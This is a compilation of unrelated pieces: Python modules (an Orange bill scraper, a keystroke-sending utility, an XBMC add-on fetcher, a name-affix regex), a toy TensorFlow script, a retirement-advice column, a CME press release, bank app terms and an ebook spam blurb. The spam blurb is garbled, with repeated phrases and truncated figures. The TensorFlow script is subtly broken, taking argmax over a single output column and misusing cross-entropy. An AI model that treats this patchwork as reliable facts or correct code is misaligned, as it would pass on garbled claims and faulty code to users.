# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this weboob module. If not, see <http://www.gnu.org/licenses/>.
from __future__ import unicode_literals
import re
try:
from html.parser import HTMLParser
except ImportError:
import HTMLParser
from weboob.browser.pages import HTMLPage, LoggedPage, JsonPage
from weboob.capabilities.bill import Subscription
from weboob.browser.elements import DictElement, ListElement, ItemElement, method, TableElement
from weboob.browser.filters.standard import (
CleanDecimal, CleanText, Env, Field,
Regexp, Date, Currency, BrowserURL,
Format, Eval, Lower,
)
from weboob.browser.filters.html import Link, TableCell
from weboob.browser.filters.javascript import JSValue
from weboob.browser.filters.json import Dict
from weboob.capabilities.base import NotAvailable
from weboob.capabilities.bill import DocumentTypes, Bill
from weboob.tools.date import parse_french_date
from weboob.tools.compat import urlencode
class BillsApiProPage(LoggedPage, JsonPage):
@method
class get_bills(DictElement):
item_xpath = 'bills'
# orange's API will sometimes return the temporary bill for the current month along with other bills
# in the json. The url will lead to the exact same document, this is probably not intended behaviour and
# causes weboob to raise a DataError as they'll have identical ids.
ignore_duplicate = True
class item(ItemElement):
klass = Bill
obj_date = Date(Dict('dueDate'), parse_func=parse_french_date, default=NotAvailable)
obj_price = CleanDecimal(Dict('amountIncludingTax'))
obj_format = 'pdf'
def obj_label(self):
return 'Facture du %s' % Field('date')(self)
def obj_id(self):
return '%s_%s' % (Env('subid')(self), Field('date')(self).strftime('%d%m%Y'))
def get_params(self):
params = {'billid': Dict('id')(self), 'billDate': Dict('dueDate')(self)}
return urlencode(params)
obj_url = BrowserURL('doc_api_pro', subid=Env('subid'), dir=Dict('documents/0/mainDir'), fact_type=Dict('documents/0/subDir'), billparams=get_params)
obj__is_v2 = False
class BillsApiParPage(LoggedPage, JsonPage):
@method
class get_bills(DictElement):
item_xpath = 'billsHistory/billList'
class item(ItemElement):
klass = Bill
obj_date = Date(Dict('date'), default=NotAvailable)
obj_price = Eval(lambda x: x / 100, CleanDecimal(Dict('amount')))
obj_format = 'pdf'
def obj_label(self):
return 'Facture du %s' % Field('date')(self)
def obj_id(self):
return '%s_%s' % (Env('subid')(self), Field('date')(self).strftime('%d%m%Y'))
obj_url = Format('%s%s', BrowserURL('doc_api_par'), Dict('hrefPdf'))
obj__is_v2 = True
# is BillsPage deprecated ?
class BillsPage(LoggedPage, HTMLPage):
@method
class get_bills(TableElement):
item_xpath = '//table[has-class("table-hover")]/div/div/tr | //table[has-class("table-hover")]/div/tr'
head_xpath = '//table[has-class("table-hover")]/thead/tr/th'
col_date = 'Date'
col_amount = ['Montant TTC', 'Montant']
col_ht = 'Montant HT'
col_url = 'Télécharger'
col_infos = 'Infos paiement'
class item(ItemElement):
klass = Bill
obj_type = DocumentTypes.BILL
obj_format = "pdf"
# TableCell('date') can have other info like: 'duplicata'
obj_date = Date(CleanText('./td[@headers="ec-dateCol"]/text()[not(preceding-sibling::br)]'), parse_func=parse_french_date, dayfirst=True)
def obj__cell(self):
# sometimes the link to the bill is not in the right column (Thanks Orange!!)
if CleanText(TableCell('url')(self))(self):
return 'url'
return 'infos'
def obj_price(self):
if CleanText(TableCell('amount')(self))(self):
return CleanDecimal(Regexp(CleanText(TableCell('amount')), '.*?([\d,]+).*', default=NotAvailable), replace_dots=True, default=NotAvailable)(self)
else:
return Field('_ht')(self)
def obj_currency(self):
if CleanText(TableCell('amount')(self))(self):
return Currency(TableCell('amount')(self))(self)
else:
return Currency(TableCell('ht')(self))(self)
# Only when a list of documents is present
obj__url_base = Regexp(CleanText('.//ul[@class="liste"]/script', default=None), '.*?contentList[\d]+ \+= \'<li><a href=".*\"(.*?idDocument=2)"', default=None)
def obj_url(self):
if Field('_url_base')(self):
# URL won't work if HTML is not unescape
return HTMLParser().unescape(str(Field('_url_base')(self)))
return Link(TableCell(Field('_cell')(self))(self)[0].xpath('./a'), default=NotAvailable)(self)
obj__label_base = Regexp(CleanText('.//ul[@class="liste"]/script', default=None), '.*</span>(.*?)</a.*', default=None)
def obj_label(self):
if Field('_label_base')(self):
return HTMLParser().unescape(str(Field('_label_base')(self)))
else:
return CleanText(TableCell(Field('_cell')(self))(self)[0].xpath('.//span[@class="ec_visually_hidden"]'))(self)
obj__ht = CleanDecimal(TableCell('ht', default=NotAvailable), replace_dots=True, default=NotAvailable)
def obj_vat(self):
if Field('_ht')(self) is NotAvailable or Field('price')(self) is NotAvailable:
return
return Field('price')(self) - Field('_ht')(self)
def obj_id(self):
if Field('price')(self) is NotAvailable:
return '%s_%s%s' % (Env('subid')(self), Field('date')(self).strftime('%d%m%Y'), Field('_ht')(self))
else:
return '%s_%s%s' % (Env('subid')(self), Field('date')(self).strftime('%d%m%Y'), Field('price')(self))
class SubscriptionsPage(LoggedPage, HTMLPage):
def build_doc(self, data):
data = data.decode(self.encoding)
for line in data.split('\n'):
mtc = re.match('necFe.bandeau.container.innerHTML\s*=\s*stripslashes\((.*)\);$', line)
if mtc:
html = JSValue().filter(mtc.group(1)).encode(self.encoding)
return super(SubscriptionsPage, self).build_doc(html)
@method
class iter_subscription(ListElement):
item_xpath = '//ul[@id="contractContainer"]//a[starts-with(@id,"carrousel-")]'
class item(ItemElement):
klass = Subscription
obj_id = Regexp(Link('.'), r'\bidContrat=(\d+)', default='')
obj__page = Regexp(Link('.'), r'\bpage=([^&]+)', default='')
obj_label = CleanText('.')
obj__is_pro = False
def validate(self, obj):
# unsubscripted contracts may still be there, skip them else
# facture-historique could yield wrong bills
return bool(obj.id) and obj._page != 'nec-tdb-ouvert'
class SubscriptionsApiPage(LoggedPage, JsonPage):
@method
class iter_subscription(DictElement):
item_xpath = 'contracts'
class item(ItemElement):
klass = Subscription
def condition(self):
return Dict('contractStatus')(self) != 'CLOS'
obj_id = Dict('contractId')
obj_label = Dict('offerName')
obj__is_pro = False
class ContractsPage(LoggedPage, JsonPage):
@method
class iter_subscriptions(DictElement):
item_xpath = 'contracts'
class item(ItemElement):
klass = Subscription
obj_id = Dict('id')
obj_label = Format('%s %s', Dict('name'), Dict('mainLine'))
obj__from_api = False
def condition(self):
return Dict('status')(self) == 'OK'
def obj__is_pro(self):
return Dict('offerNature')(self) == 'PROFESSIONAL'
class ContractsApiPage(LoggedPage, JsonPage):
@method
class iter_subscriptions(DictElement):
item_xpath = 'contracts'
class item(ItemElement):
klass = Subscription
obj_id = CleanText(Dict('cid'))
obj_label = Dict('offerName')
def obj_subscriber(self):
names = (
CleanText(Dict('holder/firstName', default=""))(self),
CleanText(Dict('holder/lastName', default=""))(self),
)
assert any(names), "At least one name field should be populated. Has the page changed?"
return ' '.join([n for n in names if n])
def obj__is_pro(self):
return Dict('telco/marketType', default='PAR')(self) == 'PRO'
obj__from_api = True
def condition(self):
return Lower(Dict('status'))(self) == 'actif'
|
Ray’s Take It’s a conversation no one wants to have; however, it’s important to have at least an idea of how financially prepared your parents are for their retirement. People are living longer – much longer – and the costs for senior care are soaring. Many older Americans saw a large portion of their nest egg disappear in the last recession.
All these factors explain why the percentage of adult children providing some level of care for their parents has more than tripled in the past 15 years, including 41 percent of the baby boomer generation.
Your parents might not welcome inquiries about their financial situation. They could see it as none of your business, or an attempt to take control. It can help to involve a third party. Ask them to go with you to a financial seminar for retirees or set up a joint appointment with a financial adviser for a consultation.
By bringing in an outside professional you give everyone a greater sense of comfort when discussing money matters. Otherwise it’s too easy to revert to old “parent-child” roles.
If it turns out your parents are in good shape, all you need to do is make sure you know where all their important paperwork is – original wills, financial records, insurance policies, powers of attorney – or know who does know this. Plus, find out if there’s a lock box and where the key is.
If you learn your parents are not in good shape financially, you and your siblings might need to step in. There may be assets that can be sold to increase savings. It might be time to consider a reverse mortgage on their home, though this is usually a last resort. You might need to open your home to them.
You’ll want to do what you can to help, just be sure not to put your own financially secure retirement at risk in the process.
Dana’s Take Parents are always talking about setting up college funds for their kids, often giving that goal priority over saving for their own retirement. This can be a costly mistake for both generations.
When you take saving for your own retirement seriously, you’re freeing your children from what could be a tremendous financial burden later. The best gift you can ever give your children and grandchildren is your own financial independence.
If you run out of money in your senior years – or don’t have enough to meet basic needs – who will pick up the slack? Is that the legacy you want to give your kids?
Paying for a college education for your kids is admirable, but don’t let it sink your own future. Your kids would be much better off paying for their own higher education now and not supporting you at the same time they’re trying to raise your grandchildren.
|
# start a session which transfers data to a C++ envirnment where it is optimized for perfomance
import tensorflow as tf
import random as rn
import trainingFunctions as funcs
sess = tf.InteractiveSession()
# two functions to initialize weight and bias
# weight is initiated with slight noise for symmetry breaking
def weight_variable(shape):
initial = tf.truncated_normal(shape, stddev=0.1)
return tf.Variable(initial)
# bias is initialized with slight positive to avoid dead neurons
def bias_variable(shape):
initial = tf.constant(0.1, shape=shape)
return tf.Variable(initial)
def conv2d(x, W):
return tf.nn.conv2d(x, W, strides=[1, 1, 1, 1], padding='SAME')
def max_pool_2x2(x):
return tf.nn.max_pool(x, ksize=[1, 2, 2, 1],
strides=[1, 2, 2, 1], padding='SAME')
# placeholders that we'll ask tensorflow to fill later
# shape lets us know that it is a 2d tensor that has a first dimension of any size, and a second dimension of size 784 (for x)
x = tf.placeholder(tf.float32, shape=[None, 1])
y_ = tf.placeholder(tf.float32, shape=[None, 1])
# Variable is a value that lives in TensorFlow's computation graph
W = tf.Variable(tf.zeros([1,1])) # W is 1x1 matrix because 1 input and 1 output
b = tf.Variable(tf.zeros([1])) # b is 1-dimensional vector (we have 10 classes)
# initialize variables in session
sess.run(tf.initialize_all_variables())
# multiply input image by weight matrix and add the bias
y = tf.nn.sigmoid(tf.matmul(x,W) + b)
# cost function (we try to minimize) is cross-entropy between the target and model's prediction
cross_entropy = tf.reduce_mean(-tf.reduce_sum(y_ * tf.log(y)))
# add new operation to computation gaph
# train_step will apply gradient descent updates to parameters
train_step = tf.train.GradientDescentOptimizer(0.5).minimize(cross_entropy)
# repeatedly calling train_step will train the model
for i in range(100):
init = 100
valArr = [0] * init
ansArr = [0] * init
for k in range(init):
ranVal = rn.randint(1, 100)
ans = funcs.adder(ranVal)
valArr[k] = [ranVal]
ansArr[k] = [ans]
train_step.run(feed_dict={x: valArr, y_: ansArr}) #feed_dict will fill our placeholders
# checks if the predicted label and actualy label are equal
correct_prediction = tf.equal(tf.argmax(y,1), tf.argmax(y_,1))
# changed [True, False, True, True] to [1, 0, 1, 1] and takes mean (probability)
accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
# init = 100
# valArr = [0] * init
# ansArr = [0] * init
# for k in range(init):
# ranVal = rn.randint(1, 10000)
# ans = funcs.adder(ranVal)
# valArr[k] = [ranVal]
# ansArr[k] = [ans]
# print(accuracy.eval(feed_dict={x: valArr, y_: ansArr}))
while True:
val = int(input("Enter val to add: "))
# prediction = tf.argmax(y, 1)
classification = y.eval(feed_dict = {x: [[val]]})
print(classification)
|
He is considered one of the most successful investors in the world and has a net worth of US$ 84. Khoo is the Executive chairman one of Asia' s largest private educational institutions, Chief Master Trainer of Adam Khoo Learning Technologies Group which runs. Is the best free ebooks download library.
Warren Edward Buffett ( / ˈ b ʌ f ɪ t / ; born August 30 1930) is an American business magnate, speaker , philanthropist who serves as the chairman , investor CEO of Berkshire Hathaway. It' s the open directory for free ebooks the best place to read ebooks , download links search free download is the best free ebooks download library. Buffettology pdf free. It' s the open directory for free ebooks the best place to read ebooks , search free download itially, download links David Clark.
4 billion as of November 1,, making him the third- wealthiest person in the world. After struggling for 6 to 8 hours, I realized that the problems solved in the documentation that accompanied my purchase had nothing to do with the problems I was trying to solve. Adam Khoo Yean Ann is a Singaporean entrepreneur author, trainer FX trader.
Is the best free ebooks download library. It' s the open directory for free ebooks and download links, and the best place to read ebooks and search free download is the best free ebooks download library. It' s the open directory for free ebooks and download links, and the best place to read ebooks and search free download itially, I purchased a newer HP calculator to make the calculations in " Buffettology" by Mary Buffett and David Clark.
After struggling for 6 to 8 hours, I realized that the problems solved in the documentation that accompanied my purchase had nothing to do with the problems I was trying to solve.
Adam Khoo Yean Ann is a Singaporean entrepreneur, author, trainer and a stocks and FX trader. Khoo is the Executive chairman and Chief Master Trainer of Adam Khoo Learning Technologies Group, one of Asia' s largest private educational institutions,.
Warren Edward Buffett ( / ˈ b ʌ f ɪ t / ; born August 30, 1930) is an American business magnate, investor, speaker and philanthropist who serves as the chairman and CEO of Berkshire Hathaway. He is considered one of the most successful investors in the world and has a net worth of US$ 84.
4 billion as of November 1,, making him the third- wealthiest person in the chive from Schiff' s Insurance Observer. December 1, 1999 Vol. 4 Right Time, Wrong Place: The slow poison of the insurance cycle.
|
"""
SendKeys.py - Sends one or more keystroke or keystroke combinations
to the active window.
Copyright (C) 2003 Ollie Rutherfurd <oliver@rutherfurd.net>
Python License
Version 0.3 (2003-06-14)
$Id$
"""
#From: https://code.google.com/p/sendkeys-ctypes/
import sys
import time
from _sendkeys import char2keycode, key_up, key_down, toggle_numlock
__all__ = ['KeySequenceError', 'SendKeys']
try:
True
except NameError:
True,False = 1,0
KEYEVENTF_KEYUP = 2
VK_SHIFT = 16
VK_CONTROL = 17
VK_MENU = 18
PAUSE = 50/1000.0 # 50 milliseconds
# 'codes' recognized as {CODE( repeat)?}
CODES = {
'BACK': 8,
'BACKSPACE': 8,
'BS': 8,
'BKSP': 8,
'BREAK': 3,
'CAP': 20,
'CAPSLOCK': 20,
'DEL': 46,
'DELETE': 46,
'DOWN': 40,
'END': 35,
'ENTER': 13,
'ESC': 27,
'HELP': 47,
'HOME': 36,
'INS': 45,
'INSERT': 45,
'LEFT': 37,
'LWIN': 91,
'NUMLOCK': 144,
'PGDN': 34,
'PGUP': 33,
'PRTSC': 44,
'RIGHT': 39,
'RMENU': 165,
'RWIN': 92,
'SCROLLLOCK': 145,
'SPACE': 32,
'TAB': 9,
'UP': 38,
'DOWN': 40,
'BACKSPACE': 8,
'F1': 112,
'F2': 113,
'F3': 114,
'F4': 115,
'F5': 116,
'F6': 117,
'F7': 118,
'F8': 119,
'F9': 120,
'F10': 121,
'F11': 122,
'F12': 123,
'F13': 124,
'F14': 125,
'F15': 126,
'F16': 127,
'F17': 128,
'F18': 129,
'F19': 130,
'F20': 131,
'F21': 132,
'F22': 133,
'F23': 134,
'F24': 135,
}
ESCAPE = '+^%~{}[]'
NO_SHIFT = '[]'
SHIFT = {
'!': '1',
'@': '2',
'#': '3',
'$': '4',
'&': '7',
'*': '8',
'_': '-',
'|': '\\',
':': ';',
'"': '\'',
'<': ',',
'>': '.',
'?': '/',
}
# modifier keys
MODIFIERS = {
'+': VK_SHIFT,
'^': VK_CONTROL,
'%': VK_MENU,
}
class KeySequenceError(Exception):
"""Exception raised when a key sequence string has a syntax error"""
def __str__(self):
return ' '.join(self.args)
def _append_code(keys,code):
keys.append((code, True))
keys.append((code, False))
def _next_char(chars,error_msg=None):
if error_msg is None:
error_msg = 'expected another character'
try:
return chars.pop()
except IndexError:
raise KeySequenceError(error_msg)
def _handle_char(c,keys,shift):
if shift:
keys.append((MODIFIERS['+'],True))
_append_code(keys, char2keycode(c))
if shift:
keys.append((MODIFIERS['+'],False))
def _release_modifiers(keys,modifiers):
for c in modifiers.keys():
if modifiers[c]:
keys.append((MODIFIERS[c], False))
modifiers[c] = False
def str2keys(key_string,
with_spaces=False,
with_tabs=False,
with_newlines=False):
"""
Converts `key_string` string to a list of 2-tuples,
``(keycode,down)``, which can be given to `playkeys`.
`key_string` : str
A string of keys.
`with_spaces` : bool
Whether to treat spaces as ``{SPACE}``. If `False`, spaces are ignored.
`with_tabs` : bool
Whether to treat tabs as ``{TAB}``. If `False`, tabs are ignored.
`with_newlines` : bool
Whether to treat newlines as ``{ENTER}``. If `False`, newlines are ignored.
"""
# reading input as a stack
chars = list(key_string)
chars.reverse()
# results
keys = []
# for keeping track of whether shift, ctrl, & alt are pressed
modifiers = {}
for k in MODIFIERS.keys():
modifiers[k] = False
while chars:
c = chars.pop()
if c in MODIFIERS.keys():
keys.append((MODIFIERS[c],True))
modifiers[c] = True
# group of chars, for applying a modifier
elif c == '(':
while c != ')':
c = _next_char(chars,'`(` without `)`')
if c == ')':
raise KeySequenceError('expected a character before `)`')
if c == ' ' and with_spaces:
_handle_char(CODES['SPACE'], keys, False)
elif c == '\n' and with_newlines:
_handle_char(CODES['ENTER'], keys, False)
elif c == '\t' and with_tabs:
_handle_char(CODES['TAB'], keys, False)
else:
# if we need shift for this char and it's not already pressed
shift = (c.isupper() or c in SHIFT.keys()) and not modifiers['+']
if c in SHIFT.keys():
_handle_char(SHIFT[c], keys, shift)
else:
_handle_char(c.lower(), keys, shift)
c = _next_char(chars,'`)` not found')
_release_modifiers(keys,modifiers)
# escaped code, modifier, or repeated char
elif c == '{':
saw_space = False
name = [_next_char(chars)]
arg = ['0']
c = _next_char(chars, '`{` without `}`')
while c != '}':
if c == ' ':
saw_space = True
elif c in '.0123456789' and saw_space:
arg.append(c)
else:
name.append(c)
c = _next_char(chars, '`{` without `}`')
code = ''.join(name)
arg = float('0' + ''.join(arg))
if code == 'PAUSE':
if not arg:
arg = PAUSE
keys.append((None,arg))
else:
# always having 1 here makes logic
# easier -- we can always loop
if arg == 0:
arg = 1
for i in range(int(arg)):
if code in CODES.keys():
_append_code(keys, CODES[code])
else:
# must be an escaped modifier or a
# repeated char at this point
if len(code) > 1:
raise KeySequenceError('Unknown code: %s' % code)
# handling both {e 3} and {+}, {%}, {^}
shift = code in ESCAPE and not code in NO_SHIFT
# do shift if we've got an upper case letter
shift = shift or code[0].isupper()
c = code
if not shift:
# handle keys in SHIFT (!, @, etc...)
if c in SHIFT.keys():
c = SHIFT[c]
shift = True
_handle_char(c.lower(), keys, shift)
_release_modifiers(keys,modifiers)
# unexpected ")"
elif c == ')':
raise KeySequenceError('`)` should be preceeded by `(`')
# unexpected "}"
elif c == '}':
raise KeySequenceError('`}` should be preceeded by `{`')
# handling a single character
else:
if c == ' ' and not with_spaces:
continue
elif c == '\t' and not with_tabs:
continue
elif c == '\n' and not with_newlines:
continue
if c in ('~','\n'):
_append_code(keys, CODES['ENTER'])
elif c == ' ':
_append_code(keys, CODES['SPACE'])
elif c == '\t':
_append_code(keys, CODES['TAB'])
else:
# if we need shift for this char and it's not already pressed
shift = (c.isupper() or c in SHIFT.keys()) and not modifiers['+']
if c in SHIFT.keys():
_handle_char(SHIFT[c], keys, shift)
else:
_handle_char(c.lower(), keys, shift)
_release_modifiers(keys,modifiers)
_release_modifiers(keys,modifiers)
return keys
def playkeys(keys, pause=.05):
"""
Simulates pressing and releasing one or more keys.
`keys` : str
A list of 2-tuples consisting of ``(keycode,down)``
where `down` is `True` when the key is being pressed
and `False` when it's being released.
`keys` is returned from `str2keys`.
`pause` : float
Number of seconds between releasing a key and pressing the
next one.
"""
for (vk, arg) in keys:
if vk:
if arg:
key_down(vk)
else:
key_up(vk)
if pause: # pause after key up
time.sleep(pause)
else:
time.sleep(arg)
def SendKeys(keys,
pause=0.05,
with_spaces=False,
with_tabs=False,
with_newlines=False,
turn_off_numlock=True):
"""
Sends keys to the current window.
`keys` : str
A string of keys.
`pause` : float
The number of seconds to wait between sending each key
or key combination.
`with_spaces` : bool
Whether to treat spaces as ``{SPACE}``. If `False`, spaces are ignored.
`with_tabs` : bool
Whether to treat tabs as ``{TAB}``. If `False`, tabs are ignored.
`with_newlines` : bool
Whether to treat newlines as ``{ENTER}``. If `False`, newlines are ignored.
`turn_off_numlock` : bool
Whether to turn off `NUMLOCK` before sending keys.
example::
SendKeys("+hello{SPACE}+world+1")
would result in ``"Hello World!"``
"""
restore_numlock = False
try:
# read keystroke keys into a list of 2 tuples [(key,up),]
_keys = str2keys(keys, with_spaces, with_tabs, with_newlines)
# certain keystrokes don't seem to behave the same way if NUMLOCK
# is on (for example, ^+{LEFT}), so turn NUMLOCK off, if it's on
# and restore its original state when done.
if turn_off_numlock:
restore_numlock = toggle_numlock(False)
# "play" the keys to the active window
playkeys(_keys, pause)
finally:
if restore_numlock and turn_off_numlock:
key_down(CODES['NUMLOCK'])
key_up(CODES['NUMLOCK'])
def usage():
"""
Writes help message to `stderr` and exits.
"""
print >> sys.stderr, """\
%(name)s [-h] [-d seconds] [-p seconds] [-f filename] or [string of keys]
-dN or --delay=N : N is seconds before starting
-pN or --pause=N : N is seconds between each key
-fNAME or --file=NAME : NAME is filename containing keys to send
-h or --help : show help message
""" % {'name': 'SendKeys.py'}
sys.exit(1)
def error(msg):
"""
Writes `msg` to `stderr`, displays usage
information, and exits.
"""
print >> sys.stderr, '\nERROR: %s\n' % msg
usage()
def main(args=None):
import getopt
if args is None:
args = sys.argv[1:]
try:
opts,args = getopt.getopt(args,
"hp:d:f:", ["help","pause","delay","file"])
except getopt.GetoptError:
usage()
pause=0
delay=0
filename=None
for o, a in opts:
if o in ('-h','--help'):
usage()
elif o in ('-f','--file'):
filename = a
elif o in ('-p','--pause'):
try:
pause = float(a)
assert pause >= 0
except (ValueError,AssertionError),e:
error('`pause` must be >= 0.0')
elif o in ('-d','--delay'):
try:
delay = float(a)
assert delay >= 0
except (ValueError,AssertionError),e:
error('`delay` must be >= 0.0')
time.sleep(delay)
if not filename is None and args:
error("can't pass both filename and string of keys on command-line")
elif filename:
f = open(filename)
keys = f.read()
f.close()
SendKeys(keys, pause)
else:
for a in args:
SendKeys(a, pause)
if __name__ == '__main__':
main(sys.argv[1:])
# :indentSize=4:lineSeparator=\r\n:maxLineLen=80:noTabs=true:tabSize=4:
|
Derivatives marketplace operator CME Group Inc (NASDAQ:CME) announced the appointment of a new member to its Competitive Markets Advisory Council (CMAC), Jacob Frenkel, Chairman of the Board of Trustees for the Group of Thirty (G-30), a private, nonprofit, international body comprised of financial industry leaders; as well as Chairman of the Board of Governors of Tel Aviv University and Chairman of JPMorgan Chase International.
Frenkel also served as Chairman and CEO of the G-30 from 2001-2011, as Vice Chairman of American International Group, Inc. from 2004-2009, and as Chairman of Merrill Lynch International from 2000-2004.
Previously, he served two terms as Governor of the Bank of Israel from 1991-2000. Prior to this, he was the Economic Counselor and Director of Research at the International Monetary Fund, and the David Rockefeller Professor of International Economics at the University of Chicago. He is the recipient of the 2002 Israel Prize in Economics, among numerous other distinctions.
CMAC was established in March 2004 by Nobel Laureates Myron Scholes and Gary Becker in partnership with CME Group Chairman Emeritus Leo Melamed. The Council consists of financial experts, including Nobel Prize winners, who serve as a “think tank” to develop and provide advice to the CME Board in the form of policy, analysis, position papers and other strategic recommendations on significant market issues. Notably, CMAC plays an integral leadership role within the CME Group Center for Innovation by selecting the annual recipients of the CME Group Melamed-Arditti Innovation Award and the CME Group-MSRI Prize in Innovative Quantitative Applications.
I am pleased to join this group of my former University of Chicago Colleagues and other distinguished economists at the Competitive Markets Advisory Council of the CME Group,” said Frenkel.
I am delighted that Dr. Frenkel has accepted our nomination to become a member of the CMAC,” said Leo Melamed, CME Group Chairman Emeritus and CMAC Vice Chairman. “The addition of this accomplished economic thought leader will strengthen the Council’s commitment to fostering innovation and dialogue on issues that impact the global markets.
The CMAC provides our Board with groundbreaking insights and cutting-edge analysis from some of the world’s top economic thought leaders,” said CME Group Chairman and Chief Executive Officer Terry Duffy. “We are honored that Dr. Frenkel, an influential expert on global market issues, will be joining the Council.
|
# -*- coding: utf-8 -*-
"""
addonpr command module
Copyright (C) 2012-2013 Team XBMC
http://www.xbmc.org
This Program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2, or (at your option)
any later version.
This Program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; see the file LICENSE. If not, see
<http://www.gnu.org/licenses/>.
"""
import os
import sys
import shlex
import shutil
import subprocess
import urllib
import zipfile
import logging
logger = logging.getLogger(__name__)
def run(cmd):
"""Run the shell command and return the result"""
cmd = cmd.encode('utf-8')
logger.debug('Run %s', cmd)
args = shlex.split(cmd)
try:
result = subprocess.check_output(args)
except subprocess.CalledProcessError as e:
sys.stderr.write(e.output)
sys.exit(e.returncode)
else:
return result.strip()
def silent_remove(filenames):
"""Remove the list of files ignoring any error"""
for filename in filenames:
try:
os.remove(filename)
except OSError:
pass
def git_pull(addon, url, revision):
current_dir = os.getcwd()
run('git clone -q "%s" %s' % (url, addon))
os.chdir(addon)
run('git checkout -q "%s"' % revision)
shutil.rmtree('.git')
silent_remove(['.gitignore', '.gitattributes'])
os.chdir(current_dir)
def svn_pull(addon, url, revision):
run('svn export "%s" -r "%s" %s' % (url, revision, addon))
def hg_pull(addon, url, revision):
run('hg clone --insecure -r "%s" "%s" %s' % (revision, url, addon))
shutil.rmtree(os.path.join(addon, '.hg'))
silent_remove([os.path.join(addon, '.hgignore')])
def zip_pull(addon, url, revision):
addon_zip = addon + '.zip'
urllib.urlretrieve(url, addon_zip)
zip_file = zipfile.ZipFile(addon_zip)
zip_file.extractall()
os.remove(addon_zip)
|
¹ Availability may be affected by your mobile device’s coverage area. Mobile Deposit is supported on Android mobile devices running OS 4.4+, iPhone® and iPad® running iOS 7.0+. Data rate charges from your service provider may apply. First National Bank of South Miami is not responsible for these charges.
FNBSM helps protect your information by using 128-bit SSL encryption technology within mobile banking sessions.
You can print and review the FNBSM Mobile Banking Terms & Conditions .
Deposit products offered by First National Bank of South Miami, Member FDIC.
Send money to anyone using our mobile app and all you need is the receiving parties email address and telephone number. Once you have them setup in the system you can easily send payments electronic to friends & family!
|
import re
# I realize *fixes may not be the proper linguistic terms for these.
# No attempt was made to be exhaustive, but some sources used:
# http://en.wikipedia.org/wiki/List_of_post-nominal_letters
# http://en.wikipedia.org/wiki/Pre-nominal_letters
# http://en.wikipedia.org/wiki/Forms_of_address_in_the_United_Kingdom
# Of these, dropping the first 9 are the most likely to cause
# false matches. Perhaps they should be treated separately?
_suffixes = ['Jr', 'Sr', 'II', 'III', 'IV', 'V', 'VI', 'VII', 'VIII',
'PhD', 'MD', 'DD', 'JD', 'PharmD', 'PsyD', 'RN', 'EngD',
'DPhil', 'MA', 'MF', 'MBA', 'MSc', 'MEd', 'EdD', 'DMin',
'AB', 'BA', 'BFA', 'BSc', 'Esq', 'Esquire', 'MP', "MS",
'USA', 'USAF', 'USMC', 'USCG', 'USN', 'Ret', r'\(Ret\)',
'CPA', 'Junior', 'Senior']
_prefixes = ['Mr', 'Mister', 'Mrs', 'Ms', 'Miss', 'Dr', 'Doctor',
'Professor', 'The', 'Honou?rable', 'Chief', 'Justice',
'His', 'Her', 'Honou?r', 'Mayor', 'Associate', 'Majesty',
'Judge', 'Master', 'Sen', 'Senator', 'Rep', 'Deputy',
'Representative', 'Congress(wo)?man', 'Sir', 'Dame',
'Speaker', r'(Majority|Minority)\W+Leader',
'President', 'Chair(wo)?man', 'Pres', 'Governor',
'Gov', 'Assembly\W+Member', 'Highness', 'Hon',
'Prime\W+Minister', r'P\.?M', 'Admiral', 'Adm',
'Colonel', 'Col', 'General', 'Gen', 'Captain',
'Capt', 'Corporal', 'CPL', 'PFC', 'Private',
r'First\W+Class', 'Sergeant', 'Sgt', 'Commissioner',
'Lieutenant', 'Lt', 'Lieut', 'Brigadier',
'Major', 'Maj', 'Officer', 'Pilot',
'Warrant', 'Officer', 'Cadet', 'Reverand',
'Minister', 'Venerable', 'Father', 'Mother', 'Brother',
'Sister', 'Rabbi', 'Fleet']
# The suffixes are obviously not all acronyms but there are probably
# plenty of people out there mistakenly writing things like 'J.r.',
# so we go ahead and allow periods between any letters
_suffix_pattern = [r"\.?".join(suffix) for suffix in _suffixes]
_suffix_pattern = r'\W*,?(\W+(%s)\.?,?)+\W*$' % r"|".join(_suffix_pattern)
_suffix_pattern = re.compile(_suffix_pattern, re.IGNORECASE)
_prefix_pattern = r'^\W*((%s)\.?(\W+|$))+' % r"|".join(_prefixes)
_prefix_pattern = re.compile(_prefix_pattern, re.IGNORECASE)
def drop_affixes(name):
"""
>>> drop_affixes("Mr. Michael Stephens, Jr.")
'Michael Stephens'
>>> drop_affixes("Lieutenant Col. Michael Stephens III, U.S.M.C. (Ret)")
'Michael Stephens'
>>> drop_affixes(" His Honour, Mayor M. Stephens III, J.D., M.D., RN ")
'M. Stephens'
>>> drop_affixes("Mr. Chief Justice")
''
>>> drop_affixes("Michael Stephens")
'Michael Stephens'
>>> drop_affixes(" Michael Stephens ")
'Michael Stephens'
>>> drop_affixes(" Stephens, Michael ")
'Stephens, Michael'
"""
return split_affixes(name)[1]
def split_affixes(name):
"""
>>> split_affixes("Mr. Michael Stephens, Jr.")
('Mr.', 'Michael Stephens', 'Jr.')
>>> split_affixes("Lieutenant Col. Michael Stephens III, U.S.M.C. (Ret)")
('Lieutenant Col.', 'Michael Stephens', 'III, U.S.M.C. (Ret)')
>>> split_affixes(" His Honour, Mayor M. Stephens III, J.D., M.D., RN ")
('His Honour, Mayor', 'M. Stephens', 'III, J.D., M.D., RN')
>>> split_affixes("Mr. Chief Justice")
('Mr. Chief Justice', '', '')
>>> split_affixes("Michael Stephens")
('', 'Michael Stephens', '')
>>> split_affixes(" Michael Stephens ")
('', 'Michael Stephens', '')
>>> split_affixes(" Stephens, Michael ")
('', 'Stephens, Michael', '')
"""
prefixes, name = split_prefixes(name)
name, suffixes = split_suffixes(name)
return (prefixes, name, suffixes)
def drop_suffixes(name):
"""
>>> drop_suffixes("Michael Stephens, Ph.D. J.D, USAF (Ret) III Esq")
'Michael Stephens'
>>> drop_suffixes("Michael Stephens Jr C.P.A ")
'Michael Stephens'
>>> drop_suffixes("Stephens, Michael Jr.")
'Stephens, Michael'
>>> drop_suffixes("Stephens, Michael ")
'Stephens, Michael'
>>> drop_suffixes("Stephens, M.")
'Stephens, M.'
"""
